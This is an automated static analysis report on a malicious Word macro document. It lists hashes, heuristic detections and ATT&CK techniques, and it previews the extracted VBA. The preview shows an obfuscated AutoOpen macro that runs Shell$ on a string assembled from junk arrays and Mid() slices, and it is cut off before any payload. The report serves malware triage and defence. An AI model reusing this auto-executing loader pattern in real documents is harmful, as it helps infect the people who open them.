Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0de3f4380b642e59…

MALICIOUS

Office (OLE)

192.5 KB Created: 2017-11-15 17:26:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 7c53bf0f3eeac307791e6b19ef6568af SHA-1: 1d3560e611507d4dca824549f103867824732836 SHA-256: 0de3f4380b642e59d0cde5570ed13bfc727000b94a034ce10e1f87bfac3fac79
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. The AutoOpen macro is present and obfuscated, a common loader technique. The extracted VBA script confirms the presence of a Shell() call and uses string concatenation to build obfuscated values, suggesting it's designed to download and execute a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 222285 bytes
SHA-256: 9560fb250d3fa1113aa1ab63cce0ac012db01c214441ba85f66ed8f711d36858
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 88 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GvHspFqNb"
Sub AutoOpen()
jPPFUKDJM = "PlAGjiDBw" + "UwkEOuJvj" + "VRkQPOGzK" + "vMhivWGwD"
Shell$ XZGDjkTXd, 0
wFdGRYKVR = "wfAVwYdir" + "bwVlzjXHo" + "QlCNwQqMq" + "DOzLGuzHS"
End Sub
Function XZGDjkTXd()
IJSiMpijJz = "4RHj9LozHLNTRkDGMbVKzKzpjIBCBZduZNJrWCUaQjclBPO64RSzLmQ"
hTCqCrmXhZa = Mid(IJSiMpijJz, 6, 36)
TCzCWTu = Array("oSSvOtCs", "bCJjTkzL", "fSiMDTEb", "iXoIXSoi", "mMulFdPI")
PFcFzqj = Array("MbLhUBik", "KcrzkrQU", "NqNrEuVJ", "OfwGqMGC", "CWAcHWGj")
EFzkQjcd = Array("tDzubqtv", "waXOPYDR", "FCTpEXuw", "WovOrnMq", "kjzAzahX")
XldjkNXGr = "W4Aj53zWphQSC4jCNFFJzHH5r5rZrJYsCXYTQzwwMKhIGXJmwiiStDaLkKGvtaToQoFidhIizdAzJNwwQibJbGwdRvTwv"
JQtkV = Mid(XldjkNXGr, 28, 60)
GBmsAjwYP = Array("mBKQosmd", "SiWFDRbV", "JwYmvfDI", "NjdjaCUf", "UvDCNiKi")
nssOGvahpdE = Array("BRvIRHnS", "EcrwCubH", "wBCIODDP", "NrkHOYHf", "otkijurG")
qiZlVJFDirU = Array("tLiwLWcZ", "UwELbCQw", "NfvaWfEf", "ULKIKzXD", "KwOCYFEr")
LITPNo = "XU9bvHYv0cBQWBEmUVwHjOJIUSwInTMVCOUSCBujlOfkOntrfIIDaYjPDwGJazjlHpOIhmkSbNVUjYuhZGdiKJudfEOFvkIoitdYZkJtYqbNDOjfBZjUUBawukcdYiXqEjmpvWHowjGUhhaRXiEVAoUhTidoIjUtSlIWbzla1vGSlz"
LLwXaki = Mid(LITPNo, 12, 154)
FEAqwi = Array("OKnSUvEm", "dmQDzQjN", "HwdALUPX", "YBBfnNaI", "bEMMslLY")
EuXsQrNVwdn = Array("HXfXjUDu", "MBvZcDft", "uQuSuYzP", "MIbvEXVV", "nEsoosrD")
MZBNazm = Array("zGTmRAjY", "YSRcrsii", "YPLXsIpo", "jZmXKqFC", "ZqVnFNzL")
YsVYb = "E4iAanRQuicszLmbbnHlsUzcKAFJwRVHsAFwTQQvHlzsZKUlhziaquPnzaWEcGTcIUAwGpHLWLiGXFDAjTbzjuQwkSwttMSARUjEKXispXEfPJPuWWXIfUtNEBLosNRJsioDWwqIojJMqkibCCWXoKUzaVAIMqzbFumlUMYYjPTvVDmfaz"
pAumPWpDqZt = Mid(YsVYb, 8, 165)
YSanjz = Array("cDWlFtiu", "aKPYjTKo", "RiFsNINi", "NPCAXqdL", "SzvpmEin")
rcOCc = Array("vszAbjWF", "fjWaHFwT", "qoYqqdWk", "hEGjXVBM", "vSwUKMGj")
oAVcVF = Array("twVrTCEM", "BczwfswR", "VNTWZpiK", "iKfoIdId", "hrwtIfQf")
ibWTaVU = "UXtrdwwMjGsBCmrtrSRfIQZEVQDbCWNJiOwKNKpHhQzClwaOHQWiilWKjWlivVKMsiWoojjjcKzrSXSYqpTmAjftsnaqZHLMGlJCZmZbjpBUnirMEMrGBYLIDdvAGqHVzllhNPwDPsCLiLFOwO723Qk3WzlrnfQBtjwuz"
BRbwaiW = Mid(ibWTaVU, 6, 141)
jvzhVnh = Array("AufvVDhC", "VfwztjHD", "OLMJXPDX", "TWRovDJq", "woWfKmob")
rrMjG = Array("dcSdiLjz", "ktfzSHIk", "qHczlsHS", "VIAFNcsb", "WljuzasH")
lQfvWBSq = Array("mUDCYMYp", "jmoDKopk", "UzHWLikI", "ADajbNnQ", "OUMRoEuJ")
wqtPcjI = "DkvQjkrPMhjs9T"
OajKQiMVz = Mid(wqtPcjI, 11, 1)
qCihVsoKjn = Array("jKZanpQi", "vvZzSVwI", "kvBUmrNS", "zYoqbYvQ", "FznAEJUL")
EYKnPwfHC = Array("mrlfnpzt", "XEjtDaXs", "zGbPBaGW", "AJsUiwDb", "aqhuGifJ")
WmOYsI = Array("avTXrCMi", "avDwhFJM", "lOidzdKb", "AFSMsdlO", "bSoFHiiw")
AJCVXBj = "vGi0SctjhDlEDAzFMasjGiiHcRGoIsptAwEKdVCpHXPvQHVdczUONjYbuYfAWFXpOsEHwnbqXDZjPjrUwcMIXbfUXcQFqBTCzahYDOhpYdqKGpMKjKEttORmMjjTWVAVjXjoCTQhvXktkVNhQFYjzZJlJuLTiNSCdUbjFXINtWwVdXCrWBCRzTYJNwfHHzChEiQcjoL0mLIwE"
NwbTPTJck = Mid(AJCVXBj, 5, 191)
tAaHBLbLh = Array("wNtnsFtV", "jVIsDBLw", "krXmjAmz", "JoWOQDED", "jjjjjWiu")
JHbvTROOq = Array("MwfWUtLZ", "GrVPLsOw", "awiEiiEc", "QFIXUcNO", "JcanVQdP")
kOzfPGkQLO = Array("dzIYipsq", "RkInsdLh", "rCFPloEi", "iHFiSbbK", "TOalWjub")
UjAwF = "U1vc2AX4j1QGYNmPZDTlUDSXjlnHoMsCBrohXrtWwLfrLkHwMjndSwZjQQoTXdLwnOEhZErhKzoJXbMvirvHYOjDSERHDZzTAjEwjaXHpGTVKQMpEtpjiDXYiBOUnkilzVIoWPPDTY6r"
lwwfAvrvaKA = Mid(UjAwF, 11, 127)
iQrjXQW = Array("NRFkTaVf", "RsvSKOip", "tdubjJXq", "JwUdDaKL", "IiBTiTLD")
GzrYuDG = Array("lZRZjIAE", "klrslSrD", "tPaVGrcr", "ijKjMLGZ", "SqqJswJA")
lEPNJL = Array("zPtRiRZq", "mzZTtpzt", "zarwwTsY", "iSZvchLv", "FZXrwLIQ")
kbknmH = "oH8MVzGlZYolmbRMMwhiLoXbrjKwwNjmwsFsjj1XQ"
lwoiKVvn = Mid(kbknmH, 6, 27)
TIZiiN = Array("JTuOmnjc", "swMSGNCi", "WVmPsiNE", "mdOTSGvl", "RaniZdmr")
TuiHMslw = Array("mwCfVsos", "XsUcYtYf", "GpbIZMKm", "BaBjZXFt", "ivdvbijt")
zvflZXVKZHG = Array("oVvZlSNY", "CIYjBdSZ", "mPiurISz", "nbtdPc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.